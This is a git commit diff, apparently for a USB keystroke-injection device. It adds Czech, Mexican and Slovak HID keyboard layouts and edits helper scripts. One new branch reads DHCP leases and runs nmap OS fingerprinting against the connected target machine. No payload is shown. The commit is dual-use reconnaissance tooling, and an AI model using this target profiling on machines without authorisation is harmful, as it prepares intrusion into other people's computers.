merge upstream

root 2017-12-19 13:29:12 -06:00
commit d978800874
116 changed files with 2409 additions and 4577 deletions

169
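--- a/languages/cz.json
+++ b/languages/cz.json
@@ -0,0 +1,169 @@
+{
+"__comment":"All numbers here are in hex format and 0x is ignored.",
+"__comment":" ",
+"__comment":"This list is in ascending order of 3rd byte (HID Usage ID).",
+"__comment":" See section 10 Keyboard/Keypad Page (0x07)",
+"__comment":" of document USB HID Usage Tables Version 1.12.",
+"__comment":" ",
+"__comment":"Definition of these 3 bytes can be found",
+"__comment":" in section B.1 Protocol 1 (Keyboard)",
+"__comment":" of document Device Class Definition for HID Version 1.11",
+"__comment":" - byte 1: Modifier keys",
+"__comment":" - byte 2: Reserved",
+"__comment":" - byte 3: Keycode 1",
+"__comment":" ",
+"__comment":"Both documents can be obtained from link here",
+"__comment":" http://www.usb.org/developers/hidpage/",
+"__comment":" ",
+"__comment":" Czech QWERTZ version made by Andrej Šimko",
+"__comment":" Note that some special characters use leftCtrl+leftAlt+[key]",
+"__comment":" Special Czech characters like ěščřžýáíéů are not included",
+"a":"00,00,04",
+"b":"00,00,05",
+"c":"00,00,06",
+"d":"00,00,07",
+"e":"00,00,08",
+"f":"00,00,09",
+"g":"00,00,0a",
+"h":"00,00,0b",
+"i":"00,00,0c",
+"j":"00,00,0d",
+"k":"00,00,0e",
+"l":"00,00,0f",
+"m":"00,00,10",
+"n":"00,00,11",
+"o":"00,00,12",
+"p":"00,00,13",
+"q":"00,00,14",
+"r":"00,00,15",
+"s":"00,00,16",
+"t":"00,00,17",
+"u":"00,00,18",
+"v":"00,00,19",
+"w":"00,00,1a",
+"x":"00,00,1b",
+"z":"00,00,1c",
+"y":"00,00,1d",
+"+":"00,00,1e",
+"ENTER":"00,00,28",
+"ESC":"00,00,29",
+"ESCAPE":"00,00,29",
+"TAB":"00,00,2b",
+" ":"00,00,2c",
+"SPACE":"00,00,2c",
+"CTRL-ALT":"05,00,00",
+"=":"00,00,2d",
+")":"00,00,30",
+";":"00,00,35",
+",":"00,00,36",
+".":"00,00,37",
+"-":"00,00,38",
+"CAPSLOCK":"00,00,39",
+"F1":"00,00,3a",
+"F2":"00,00,3b",
+"F3":"00,00,3c",
+"F4":"00,00,3d",
+"F5":"00,00,3e",
+"F6":"00,00,3f",
+"F7":"00,00,40",
+"F8":"00,00,41",
+"F9":"00,00,42",
+"F10":"00,00,43",
+"F11":"00,00,44",
+"F12":"00,00,45",
+"PRINTSCREEN":"00,00,46",
+"SCROLLLOCK":"00,00,47",
+"BREAK":"00,00,48",
+"PAUSE":"00,00,48",
+"INSERT":"00,00,49",
+"HOME":"00,00,4a",
+"PAGEUP":"00,00,4b",
+"DEL":"00,00,4c",
+"DELETE":"00,00,4c",
+"END":"00,00,4d",
+"PAGEDOWN":"00,00,4e",
+"RIGHT":"00,00,4f",
+"RIGHTARROW":"00,00,4f",
+"LEFT":"00,00,50",
+"LEFTARROW":"00,00,50",
+"DOWN":"00,00,51",
+"DOWNARROW":"00,00,51",
+"UP":"00,00,52",
+"UPARROW":"00,00,52",
+"APP":"00,00,65",
+"MENU":"00,00,65",
+"ALT-TAB":"00,00,71",
+"CONTROL":"01,00,00",
+"CTRL":"01,00,00",
+"SHIFT":"02,00,00",
+"A":"02,00,04",
+"B":"02,00,05",
+"C":"02,00,06",
+"D":"02,00,07",
+"E":"02,00,08",
+"F":"02,00,09",
+"G":"02,00,0a",
+"H":"02,00,0b",
+"I":"02,00,0c",
+"J":"02,00,0d",
+"K":"02,00,0e",
+"L":"02,00,0f",
+"M":"02,00,10",
+"N":"02,00,11",
+"O":"02,00,12",
+"P":"02,00,13",
+"Q":"02,00,14",
+"R":"02,00,15",
+"S":"02,00,16",
+"T":"02,00,17",
+"U":"02,00,18",
+"V":"02,00,19",
+"W":"02,00,1a",
+"X":"02,00,1b",
+"Z":"02,00,1c",
+"Y":"02,00,1d",
+"1":"02,00,1e",
+"2":"02,00,1f",
+"3":"02,00,20",
+"4":"02,00,21",
+"5":"02,00,22",
+"6":"02,00,23",
+"7":"02,00,24",
+"8":"02,00,25",
+"9":"02,00,26",
+"0":"02,00,27",
+"\\":"05,00,14",
+"%":"02,00,2d",
+"/":"02,00,2f",
+"(":"02,00,30",
+"'":"02,00,31",
+"\"":"02,00,33",
+"!":"02,00,34",
+"?":"02,00,36",
+":":"02,00,37",
+"_":"02,00,38",
+"|":"05,00,1a",
+"#":"05,00,1b",
+"&":"05,00,06",
+"@":"05,00,19",
+"$":"05,00,33",
+"*":"05,00,38",
+"{":"05,00,05",
+"}":"05,00,11",
+"[":"05,00,09",
+"]":"05,00,0a",
+"~":"05,00,1e",
+"^":"05,00,20",
+"<":"05,00,36",
+">":"05,00,37",
+"CTRL-SHIFT":"03,00,00",
+"ALT":"04,00,00",
+"ALT-SHIFT":"06,00,00",
+"COMMAND":"08,00,00",
+"GUI":"08,00,00",
+"WINDOWS":"08,00,00",
+"COMMAND-OPTION":"12,00,00",
+"COMMAND-CTRL-SHIFT":"12,00,00",
+"COMMAND-CTRL":"12,00,00",
+"COMMAND-OPTION-SHIFT'":"12,00,00"
+}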
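Review bot: The last key is spelled `"COMMAND-OPTION-SHIFT'"` with a stray apostrophe inside the quotes, so a lookup for COMMAND-OPTION-SHIFT will presumably miss it; languages/sk.json in this commit has the same typo. In all three new layouts (cz, mx, sk) the four COMMAND-* combinations share the single value `12,00,00`, which cannot tell them apart and, read as HID modifier bits, does not include the GUI bit `08` at all. `ALT-TAB` is `00,00,71`, which carries no Alt modifier. The rewritten layout further down this commit uses `09`, `0B`, `0C`, `0E` for the COMMAND-* combinations and `04,00,2b` for ALT-TAB, and those values look like the ones to copy here, e.g. `"COMMAND-OPTION-SHIFT":"0E,00,00"`.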

177
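--- a/languages/mx.json
+++ b/languages/mx.json
@@ -0,0 +1,177 @@
+{
+"__comment":"All numbers here are in hex format and 0x is ignored.",
+"__comment":" ",
+"__comment":"This list is in ascending order of 3rd byte (HID Usage ID).",
+"__comment":" See section 10 Keyboard/Keypad Page (0x07)",
+"__comment":" of document USB HID Usage Tables Version 1.12.",
+"__comment":" ",
+"__comment":"Definition of these 3 bytes can be found",
+"__comment":" in section B.1 Protocol 1 (Keyboard)",
+"__comment":" of document Device Class Definition for HID Version 1.11",
+"__comment":" - byte 1: Modifier keys",
+"__comment":" - byte 2: Reserved",
+"__comment":" - byte 3: Keycode 1",
+"__comment":" ",
+"__comment":"Both documents can be obtained from link here",
+"__comment":" http://www.usb.org/developers/hidpage/",
+"__comment":" ",
+"__comment":"A = LeftShift + a, { = LeftShift + [",
+"__comment":" ",
+"a":"00,00,04",
+"b":"00,00,05",
+"c":"00,00,06",
+"d":"00,00,07",
+"e":"00,00,08",
+"f":"00,00,09",
+"g":"00,00,0a",
+"h":"00,00,0b",
+"i":"00,00,0c",
+"j":"00,00,0d",
+"k":"00,00,0e",
+"l":"00,00,0f",
+"m":"00,00,10",
+"n":"00,00,11",
+"o":"00,00,12",
+"p":"00,00,13",
+"q":"00,00,14",
+"r":"00,00,15",
+"s":"00,00,16",
+"t":"00,00,17",
+"u":"00,00,18",
+"v":"00,00,19",
+"w":"00,00,1a",
+"x":"00,00,1b",
+"y":"00,00,1c",
+"z":"00,00,1d",
+"1":"00,00,1e",
+"2":"00,00,1f",
+"3":"00,00,20",
+"4":"00,00,21",
+"5":"00,00,22",
+"6":"00,00,23",
+"7":"00,00,24",
+"8":"00,00,25",
+"9":"00,00,26",
+"0":"00,00,27",
+"ENTER":"00,00,28",
+"ESC":"00,00,29",
+"ESCAPE":"00,00,29",
+"TAB":"00,00,2b",
+" ":"00,00,2c",
+"SPACE":"00,00,2c",
+"'":"00,00,2d",
+"¿":"00,00,2e",
+"´":"00,00,2f",
+"+":"00,00,30",
+"}":"00,00,31",
+"ñ":"00,00,33",
+"{":"00,00,34",
+"|":"00,00,35",
+",":"00,00,36",
+".":"00,00,37",
+"-":"00,00,38",
+"CAPSLOCK":"00,00,39",
+"F1":"00,00,3a",
+"F2":"00,00,3b",
+"F3":"00,00,3c",
+"F4":"00,00,3d",
+"F5":"00,00,3e",
+"F6":"00,00,3f",
+"F7":"00,00,40",
+"F8":"00,00,41",
+"F9":"00,00,42",
+"F10":"00,00,43",
+"F11":"00,00,44",
+"F12":"00,00,45",
+"PRINTSCREEN":"00,00,46",
+"SCROLLLOCK":"00,00,47",
+"BREAK":"00,00,48",
+"PAUSE":"00,00,48",
+"INSERT":"00,00,49",
+"HOME":"00,00,4a",
+"PAGEUP":"00,00,4b",
+"DEL":"00,00,4c",
+"DELETE":"00,00,4c",
+"END":"00,00,4d",
+"PAGEDOWN":"00,00,4e",
+"RIGHT":"00,00,4f",
+"RIGHTARROW":"00,00,4f",
+"LEFT":"00,00,50",
+"LEFTARROW":"00,00,50",
+"DOWN":"00,00,51",
+"DOWNARROW":"00,00,51",
+"UP":"00,00,52",
+"UPARROW":"00,00,52",
+"<":"00,00,64",
+"APP":"00,00,65",
+"MENU":"00,00,65",
+"ALT-TAB":"00,00,71",
+"CONTROL":"01,00,00",
+"CTRL":"01,00,00",
+"SHIFT":"02,00,00",
+"A":"02,00,04",
+"B":"02,00,05",
+"C":"02,00,06",
+"D":"02,00,07",
+"E":"02,00,08",
+"F":"02,00,09",
+"G":"02,00,0a",
+"H":"02,00,0b",
+"I":"02,00,0c",
+"J":"02,00,0d",
+"K":"02,00,0e",
+"L":"02,00,0f",
+"M":"02,00,10",
+"N":"02,00,11",
+"O":"02,00,12",
+"P":"02,00,13",
+"Q":"02,00,14",
+"R":"02,00,15",
+"S":"02,00,16",
+"T":"02,00,17",
+"U":"02,00,18",
+"V":"02,00,19",
+"W":"02,00,1a",
+"X":"02,00,1b",
+"Y":"02,00,1c",
+"Z":"02,00,1d",
+"!":"02,00,1e",
+"\"":"02,00,1f",
+"#":"02,00,20",
+"$":"02,00,21",
+"%":"02,00,22",
+"&":"02,00,23",
+"/":"02,00,24",
+"(":"02,00,25",
+")":"02,00,26",
+"=":"02,00,27",
+"?":"02,00,2d",
+"¡":"02,00,2e",
+"¨":"02,00,2f",
+"*":"02,00,30",
+"]":"02,00,31",
+"Ñ":"02,00,33",
+"[":"02,00,34",
+"°":"02,00,35",
+";":"02,00,36",
+":":"02,00,37",
+"_":"02,00,38",
+">":"02,00,64",
+"CTRL-SHIFT":"03,00,00",
+"ALT":"04,00,00",
+"CTRL-ALT":"05,00,00",
+"\\":"05,00,2d",
+"~":"05,00,30",
+"`":"05,00,31",
+"^":"05,00,34",
+"¬":"05,00,35",
+"ALT-SHIFT":"06,00,00",
+"COMMAND":"08,00,00",
+"GUI":"08,00,00",
+"WINDOWS":"08,00,00",
+"COMMAND-OPTION":"12,00,00",
+"COMMAND-CTRL-SHIFT":"12,00,00",
+"COMMAND-CTRL":"12,00,00",
+"COMMAND-OPTION-SHIFT":"12,00,00",
+"@":"40,00,14"
+}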

169
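--- a/languages/sk.json
+++ b/languages/sk.json
@@ -0,0 +1,169 @@
+{
+"__comment":"All numbers here are in hex format and 0x is ignored.",
+"__comment":" ",
+"__comment":"This list is in ascending order of 3rd byte (HID Usage ID).",
+"__comment":" See section 10 Keyboard/Keypad Page (0x07)",
+"__comment":" of document USB HID Usage Tables Version 1.12.",
+"__comment":" ",
+"__comment":"Definition of these 3 bytes can be found",
+"__comment":" in section B.1 Protocol 1 (Keyboard)",
+"__comment":" of document Device Class Definition for HID Version 1.11",
+"__comment":" - byte 1: Modifier keys",
+"__comment":" - byte 2: Reserved",
+"__comment":" - byte 3: Keycode 1",
+"__comment":" ",
+"__comment":"Both documents can be obtained from link here",
+"__comment":" http://www.usb.org/developers/hidpage/",
+"__comment":" ",
+"__comment":" Slovak QWERTZ version made by Andrej Šimko",
+"__comment":" Note that some special characters use leftCtrl+leftAlt+[key]",
+"__comment":" Special Slovak characters like ľščťžýáíéúäô are not included",
+"a":"00,00,04",
+"b":"00,00,05",
+"c":"00,00,06",
+"d":"00,00,07",
+"e":"00,00,08",
+"f":"00,00,09",
+"g":"00,00,0a",
+"h":"00,00,0b",
+"i":"00,00,0c",
+"j":"00,00,0d",
+"k":"00,00,0e",
+"l":"00,00,0f",
+"m":"00,00,10",
+"n":"00,00,11",
+"o":"00,00,12",
+"p":"00,00,13",
+"q":"00,00,14",
+"r":"00,00,15",
+"s":"00,00,16",
+"t":"00,00,17",
+"u":"00,00,18",
+"v":"00,00,19",
+"w":"00,00,1a",
+"x":"00,00,1b",
+"z":"00,00,1c",
+"y":"00,00,1d",
+"+":"00,00,1e",
+"ENTER":"00,00,28",
+"ESC":"00,00,29",
+"ESCAPE":"00,00,29",
+"TAB":"00,00,2b",
+" ":"00,00,2c",
+"SPACE":"00,00,2c",
+"CTRL-ALT":"05,00,00",
+"=":"00,00,2d",
+";":"00,00,35",
+",":"00,00,36",
+".":"00,00,37",
+"-":"00,00,38",
+"CAPSLOCK":"00,00,39",
+"F1":"00,00,3a",
+"F2":"00,00,3b",
+"F3":"00,00,3c",
+"F4":"00,00,3d",
+"F5":"00,00,3e",
+"F6":"00,00,3f",
+"F7":"00,00,40",
+"F8":"00,00,41",
+"F9":"00,00,42",
+"F10":"00,00,43",
+"F11":"00,00,44",
+"F12":"00,00,45",
+"PRINTSCREEN":"00,00,46",
+"SCROLLLOCK":"00,00,47",
+"BREAK":"00,00,48",
+"PAUSE":"00,00,48",
+"INSERT":"00,00,49",
+"HOME":"00,00,4a",
+"PAGEUP":"00,00,4b",
+"DEL":"00,00,4c",
+"DELETE":"00,00,4c",
+"END":"00,00,4d",
+"PAGEDOWN":"00,00,4e",
+"RIGHT":"00,00,4f",
+"RIGHTARROW":"00,00,4f",
+"LEFT":"00,00,50",
+"LEFTARROW":"00,00,50",
+"DOWN":"00,00,51",
+"DOWNARROW":"00,00,51",
+"UP":"00,00,52",
+"UPARROW":"00,00,52",
+"APP":"00,00,65",
+"MENU":"00,00,65",
+"ALT-TAB":"00,00,71",
+"CONTROL":"01,00,00",
+"CTRL":"01,00,00",
+"SHIFT":"02,00,00",
+"A":"02,00,04",
+"B":"02,00,05",
+"C":"02,00,06",
+"D":"02,00,07",
+"E":"02,00,08",
+"F":"02,00,09",
+"G":"02,00,0a",
+"H":"02,00,0b",
+"I":"02,00,0c",
+"J":"02,00,0d",
+"K":"02,00,0e",
+"L":"02,00,0f",
+"M":"02,00,10",
+"N":"02,00,11",
+"O":"02,00,12",
+"P":"02,00,13",
+"Q":"02,00,14",
+"R":"02,00,15",
+"S":"02,00,16",
+"T":"02,00,17",
+"U":"02,00,18",
+"V":"02,00,19",
+"W":"02,00,1a",
+"X":"02,00,1b",
+"Z":"02,00,1c",
+"Y":"02,00,1d",
+"1":"02,00,1e",
+"2":"02,00,1f",
+"3":"02,00,20",
+"4":"02,00,21",
+"5":"02,00,22",
+"6":"02,00,23",
+"7":"02,00,24",
+"8":"02,00,25",
+"9":"02,00,26",
+"0":"02,00,27",
+"\\":"05,00,14",
+"%":"02,00,2d",
+"/":"02,00,2f",
+"(":"02,00,30",
+"'":"05,00,13",
+")":"02,00,31",
+"\"":"02,00,33",
+"!":"02,00,34",
+"?":"02,00,36",
+":":"02,00,37",
+"_":"02,00,38",
+"|":"05,00,1a",
+"#":"05,00,1b",
+"&":"05,00,06",
+"@":"05,00,19",
+"$":"05,00,33",
+"*":"05,00,38",
+"{":"05,00,05",
+"}":"05,00,11",
+"[":"05,00,09",
+"]":"05,00,0a",
+"~":"05,00,1e",
+"^":"05,00,20",
+"<":"05,00,36",
+">":"05,00,37",
+"CTRL-SHIFT":"03,00,00",
+"ALT":"04,00,00",
+"ALT-SHIFT":"06,00,00",
+"COMMAND":"08,00,00",
+"GUI":"08,00,00",
+"WINDOWS":"08,00,00",
+"COMMAND-OPTION":"12,00,00",
+"COMMAND-CTRL-SHIFT":"12,00,00",
+"COMMAND-CTRL":"12,00,00",
+"COMMAND-OPTION-SHIFT'":"12,00,00"
+}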


@ -1,169 +1,173 @@
{
"__comment":"All numbers here are in hex format and 0x is ignored.",
"__comment":" ",
"__comment":"This list is in ascending order of 3rd byte (HID Usage ID).",
"__comment":" See section 10 Keyboard/Keypad Page (0x07)",
"__comment":" of document USB HID Usage Tables Version 1.12.",
"__comment":" ",
"__comment":"Definition of these 3 bytes can be found",
"__comment":" in section B.1 Protocol 1 (Keyboard)",
"__comment":" of document Device Class Definition for HID Version 1.11",
"__comment":" - byte 1: Modifier keys",
"__comment":" - byte 2: Reserved",
"__comment":" - byte 3: Keycode 1",
"__comment":" ",
"__comment":"Both documents can be obtained from link here",
"__comment":" http://www.usb.org/developers/hidpage/",
"__comment":" ",
"__comment":"A = LeftShift + a, { = LeftShift + [",
"__comment":" ",
"a":"00,00,04",
"b":"00,00,05",
"c":"00,00,06",
"d":"00,00,07",
"e":"00,00,08",
"f":"00,00,09",
"g":"00,00,0a",
"h":"00,00,0b",
"i":"00,00,0c",
"j":"00,00,0d",
"k":"00,00,0e",
"l":"00,00,0f",
"m":"00,00,10",
"n":"00,00,11",
"o":"00,00,12",
"p":"00,00,13",
"q":"00,00,14",
"r":"00,00,15",
"s":"00,00,16",
"t":"00,00,17",
"u":"00,00,18",
"v":"00,00,19",
"w":"00,00,1a",
"x":"00,00,1b",
"y":"00,00,1c",
"z":"00,00,1d",
"1":"00,00,1e",
"2":"00,00,1f",
"3":"00,00,20",
"4":"00,00,21",
"5":"00,00,22",
"6":"00,00,23",
"7":"00,00,24",
"8":"00,00,25",
"9":"00,00,26",
"0":"00,00,27",
"ENTER":"00,00,28",
"ESC":"00,00,29",
"ESCAPE":"00,00,29",
"TAB":"00,00,2b",
" ":"00,00,2c",
"SPACE":"00,00,2c",
"-":"00,00,2d",
"=":"00,00,2e",
"[":"00,00,2f",
"]":"00,00,30",
"\\":"00,00,31",
";":"00,00,33",
"'":"00,00,34",
"`":"00,00,35",
",":"00,00,36",
".":"00,00,37",
"/":"00,00,38",
"CAPSLOCK":"00,00,39",
"F1":"00,00,3a",
"F2":"00,00,3b",
"F3":"00,00,3c",
"F4":"00,00,3d",
"F5":"00,00,3e",
"F6":"00,00,3f",
"F7":"00,00,40",
"F8":"00,00,41",
"F9":"00,00,42",
"F10":"00,00,43",
"F11":"00,00,44",
"F12":"00,00,45",
"PRINTSCREEN":"00,00,46",
"SCROLLLOCK":"00,00,47",
"BREAK":"00,00,48",
"PAUSE":"00,00,48",
"INSERT":"00,00,49",
"HOME":"00,00,4a",
"PAGEUP":"00,00,4b",
"DEL":"00,00,4c",
"DELETE":"00,00,4c",
"END":"00,00,4d",
"PAGEDOWN":"00,00,4e",
"RIGHT":"00,00,4f",
"RIGHTARROW":"00,00,4f",
"LEFT":"00,00,50",
"LEFTARROW":"00,00,50",
"DOWN":"00,00,51",
"DOWNARROW":"00,00,51",
"UP":"00,00,52",
"UPARROW":"00,00,52",
"APP":"00,00,65",
"MENU":"00,00,65",
"ALT-TAB":"00,00,71",
"CONTROL":"01,00,00",
"CTRL":"01,00,00",
"SHIFT":"02,00,00",
"A":"02,00,04",
"B":"02,00,05",
"C":"02,00,06",
"D":"02,00,07",
"E":"02,00,08",
"F":"02,00,09",
"G":"02,00,0a",
"H":"02,00,0b",
"I":"02,00,0c",
"J":"02,00,0d",
"K":"02,00,0e",
"L":"02,00,0f",
"M":"02,00,10",
"N":"02,00,11",
"O":"02,00,12",
"P":"02,00,13",
"Q":"02,00,14",
"R":"02,00,15",
"S":"02,00,16",
"T":"02,00,17",
"U":"02,00,18",
"V":"02,00,19",
"W":"02,00,1a",
"X":"02,00,1b",
"Y":"02,00,1c",
"Z":"02,00,1d",
"!":"02,00,1e",
"@":"02,00,1f",
"#":"02,00,20",
"$":"02,00,21",
"%":"02,00,22",
"^":"02,00,23",
"&":"02,00,24",
"*":"02,00,25",
"(":"02,00,26",
")":"02,00,27",
"_":"02,00,2d",
"+":"02,00,2e",
"{":"02,00,2f",
"}":"02,00,30",
"|":"02,00,31",
":":"02,00,33",
"\"":"02,00,34",
"~":"02,00,35",
"<":"02,00,36",
">":"02,00,37",
"?":"02,00,38",
"CTRL-SHIFT":"03,00,00",
"ALT":"04,00,00",
"CTRL-ALT":"05,00,00",
"ALT-SHIFT":"06,00,00",
"COMMAND":"08,00,00",
"GUI":"08,00,00",
"WINDOWS":"08,00,00",
"COMMAND-OPTION":"12,00,00",
"COMMAND-CTRL-SHIFT":"12,00,00",
"COMMAND-CTRL":"12,00,00",
"COMMAND-OPTION-SHIFT'":"12,00,00"
}
"__comment": "All numbers here are in hex format and 0x is ignored.",
"__comment": " ",
"__comment": "This list is in ascending order of 3rd byte (HID Usage ID).",
"__comment": " See section 10 Keyboard/Keypad Page (0x07)",
"__comment": " of document USB HID Usage Tables Version 1.12.",
"__comment": " ",
"__comment": "Definition of these 3 bytes can be found",
"__comment": " in section B.1 Protocol 1 (Keyboard)",
"__comment": " of document Device Class Definition for HID Version 1.11",
"__comment": " - byte 1: Modifier keys",
"__comment": " - byte 2: Reserved",
"__comment": " - byte 3: Keycode 1",
"__comment": " ",
"__comment": "Both documents can be obtained from link here",
"__comment": " http://www.usb.org/developers/hidpage/",
"__comment": " ",
"__comment": "A = LeftShift + a, { = LeftShift + [",
"__comment": " ",
"CTRL": "01,00,00",
"CONTROL": "01,00,00",
"SHIFT": "02,00,00",
"ALT": "04,00,00",
"GUI": "08,00,00",
"WINDOWS": "08,00,00",
"CTRL-ALT": "05,00,00",
"CTRL-SHIFT": "03,00,00",
"ALT-SHIFT": "06,00,00",
"__comment": "Below 5 key combinations are for Mac OSX",
"__comment": "Example: (COMMAND-OPTION SHIFT t) to open terminal",
"COMMAND": "08,00,00",
"COMMAND-CTRL": "09,00,00",
"COMMAND-CTRL-SHIFT": "0B,00,00",
"COMMAND-OPTION": "0C,00,00",
"COMMAND-OPTION-SHIFT": "0E,00,00",
"a": "00,00,04",
"A": "02,00,04",
"b": "00,00,05",
"B": "02,00,05",
"c": "00,00,06",
"C": "02,00,06",
"d": "00,00,07",
"D": "02,00,07",
"e": "00,00,08",
"E": "02,00,08",
"f": "00,00,09",
"F": "02,00,09",
"g": "00,00,0a",
"G": "02,00,0a",
"h": "00,00,0b",
"H": "02,00,0b",
"i": "00,00,0c",
"I": "02,00,0c",
"j": "00,00,0d",
"J": "02,00,0d",
"k": "00,00,0e",
"K": "02,00,0e",
"l": "00,00,0f",
"L": "02,00,0f",
"m": "00,00,10",
"M": "02,00,10",
"n": "00,00,11",
"N": "02,00,11",
"o": "00,00,12",
"O": "02,00,12",
"p": "00,00,13",
"P": "02,00,13",
"q": "00,00,14",
"Q": "02,00,14",
"r": "00,00,15",
"R": "02,00,15",
"s": "00,00,16",
"S": "02,00,16",
"t": "00,00,17",
"T": "02,00,17",
"u": "00,00,18",
"U": "02,00,18",
"v": "00,00,19",
"V": "02,00,19",
"w": "00,00,1a",
"W": "02,00,1a",
"x": "00,00,1b",
"X": "02,00,1b",
"y": "00,00,1c",
"Y": "02,00,1c",
"z": "00,00,1d",
"Z": "02,00,1d",
"1": "00,00,1e",
"!": "02,00,1e",
"2": "00,00,1f",
"@": "02,00,1f",
"3": "00,00,20",
"#": "02,00,20",
"4": "00,00,21",
"$": "02,00,21",
"5": "00,00,22",
"%": "02,00,22",
"6": "00,00,23",
"^": "02,00,23",
"7": "00,00,24",
"&": "02,00,24",
"8": "00,00,25",
"*": "02,00,25",
"9": "00,00,26",
"(": "02,00,26",
"0": "00,00,27",
")": "02,00,27",
"ENTER": "00,00,28",
"ESC": "00,00,29",
"ESCAPE": "00,00,29",
"BACKSPACE": "00,00,2a",
"TAB": "00,00,2b",
"ALT-TAB": "04,00,2b",
"SPACE": "00,00,2c",
" ": "00,00,2c",
"-": "00,00,2d",
"_": "02,00,2d",
"=": "00,00,2e",
"+": "02,00,2e",
"[": "00,00,2f",
"{": "02,00,2f",
"]": "00,00,30",
"}": "02,00,30",
"\\": "00,00,31",
"|": "02,00,31",
";": "00,00,33",
":": "02,00,33",
"'": "00,00,34",
"\"": "02,00,34",
"`": "00,00,35",
"~": "02,00,35",
",": "00,00,36",
"<": "02,00,36",
".": "00,00,37",
">": "02,00,37",
"/": "00,00,38",
"?": "02,00,38",
"CAPSLOCK": "00,00,39",
"F1": "00,00,3a",
"F2": "00,00,3b",
"F3": "00,00,3c",
"F4": "00,00,3d",
"F5": "00,00,3e",
"F6": "00,00,3f",
"F7": "00,00,40",
"F8": "00,00,41",
"F9": "00,00,42",
"F10": "00,00,43",
"F11": "00,00,44",
"F12": "00,00,45",
"PRINTSCREEN":"00,00,46",
"SCROLLLOCK": "00,00,47",
"PAUSE": "00,00,48",
"BREAK": "00,00,48",
"INSERT": "00,00,49",
"HOME": "00,00,4a",
"PAGEUP": "00,00,4b",
"DELETE": "00,00,4c",
"DEL": "00,00,4c",
"END": "00,00,4d",
"PAGEDOWN": "00,00,4e",
"RIGHTARROW": "00,00,4f",
"RIGHT": "00,00,4f",
"LEFTARROW": "00,00,50",
"LEFT": "00,00,50",
"DOWNARROW": "00,00,51",
"DOWN": "00,00,51",
"UPARROW": "00,00,52",
"UP": "00,00,52",
"NUMLOCK": "00,00,53",
"MENU": "00,00,65",
"APP": "00,00,65"
}

40
payloads/extensions/cucumber.sh Normal file → Executable file

@ -1,25 +1,25 @@
#!/bin/bash
function CUCUMBER() {
case $1 in
"ENABLE")
echo ondemand | tee /sys/devices/system/cpu/cpu{0..3}/cpufreq/scaling_governor &> /dev/null
echo 0 | tee /sys/devices/system/cpu/cpu{1..3}/online &> /dev/null
;;
"DISABLE")
echo 1 | tee /sys/devices/system/cpu/cpu{1..3}/online &> /dev/null
sleep 2
echo ondemand | tee /sys/devices/system/cpu/cpu{0..3}/cpufreq/scaling_governor &> /dev/null
;;
"PLAID")
echo 1 | tee /sys/devices/system/cpu/cpu{1..3}/online &> /dev/null
sleep 2
echo performance | tee /sys/devices/system/cpu/cpu{0..3}/cpufreq/scaling_governor &> /dev/null
;;
*)
LED FAIL
exit 1
esac
case $1 in
"ENABLE")
echo ondemand | tee /sys/devices/system/cpu/cpu{0..3}/cpufreq/scaling_governor &> /dev/null
echo 0 | tee /sys/devices/system/cpu/cpu{1..3}/online &> /dev/null
;;
"DISABLE")
echo 1 | tee /sys/devices/system/cpu/cpu{1..3}/online &> /dev/null
sleep 2
echo ondemand | tee /sys/devices/system/cpu/cpu{0..3}/cpufreq/scaling_governor &> /dev/null
;;
"PLAID")
echo 1 | tee /sys/devices/system/cpu/cpu{1..3}/online &> /dev/null
sleep 2
echo performance | tee /sys/devices/system/cpu/cpu{0..3}/cpufreq/scaling_governor &> /dev/null
;;
*)
LED FAIL
exit 1
esac
}
export -f CUCUMBER
export -f CUCUMBER


@ -1,8 +1,8 @@
#!/bin/bash
function DUCKY_LANG() {
[[ -z "$1" ]] && exit 1 # parameter must be set
[[ -z "$1" ]] && exit 1 # parameter must be set
export DUCKY_LANG="$1"
export DUCKY_LANG="$1"
}
export -f DUCKY_LANG


@ -1,23 +1,32 @@
#!/bin/bash
function GET() {
case $1 in
"TARGET_IP")
export TARGET_IP=$(cat /var/lib/dhcp/dhcpd.leases | grep ^lease | awk '{ print $2 }' | sort | uniq)
;;
"TARGET_HOSTNAME")
export TARGET_HOSTNAME=$(cat /var/lib/dhcp/dhcpd.leases | grep hostname | awk '{print $2 }' | sort | uniq | tail -n1 | sed "s/^[ \t]*//" | sed 's/\"//g' | sed 's/;//')
;;
"HOST_IP")
export HOST_IP=$(cat /etc/network/interfaces.d/usb0 | grep address | awk {'print $2'})
;;
"SWITCH_POSITION")
[[ "$(cat /sys/class/gpio_sw/PA8/data)" == "0" ]] && export SWITCH_POSITION="switch1" && return
[[ "$(cat /sys/class/gpio_sw/PL4/data)" == "0" ]] && export SWITCH_POSITION="switch2" && return
[[ "$(cat /sys/class/gpio_sw/PL3/data)" == "0" ]] && export SWITCH_POSITION="switch3" && return
export SWITCH_POSITION="invalid"
;;
esac
case $1 in
"TARGET_IP")
export TARGET_IP=$(cat /var/lib/dhcp/dhcpd.leases | grep ^lease | awk '{ print $2 }' | sort | uniq)
;;
"TARGET_HOSTNAME")
export TARGET_HOSTNAME=$(cat /var/lib/dhcp/dhcpd.leases | grep hostname | awk '{print $2 }' | sort | uniq | tail -n1 | sed "s/^[ \t]*//" | sed 's/\"//g' | sed 's/;//')
;;
"HOST_IP")
export HOST_IP=$(cat /etc/network/interfaces.d/usb0 | grep address | awk {'print $2'})
;;
"SWITCH_POSITION")
[[ "$(cat /sys/class/gpio_sw/PA8/data)" == "0" ]] && export SWITCH_POSITION="switch1" && return
[[ "$(cat /sys/class/gpio_sw/PL4/data)" == "0" ]] && export SWITCH_POSITION="switch2" && return
[[ "$(cat /sys/class/gpio_sw/PL3/data)" == "0" ]] && export SWITCH_POSITION="switch3" && return
export SWITCH_POSITION="invalid"
;;
"TARGET_OS")
TARGET_IP=$(cat /var/lib/dhcp/dhcpd.leases | grep ^lease | awk '{ print $2 }' | sort | uniq)
ScanForOS=$(nmap -Pn -O $TARGET_IP -p1)
[[ $ScanForOS == *"Too many fingerprints"* ]] && ScanForOS=$(nmap -Pn -O --osscan-guess $TARGET_IP)
[[ $ScanForOS == *"Windows"* ]] && export TARGET_OS='WINDOWS' && return
[[ $ScanForOS == *"Linux"* ]] && export TARGET_OS='LINUX' && return
[[ $ScanForOS == *"Apple"* ]] && export TARGET_OS='MACOS' && return
export TARGET_OS='UNKNOWN'
;;
esac
}
export -f GET
export -f GET
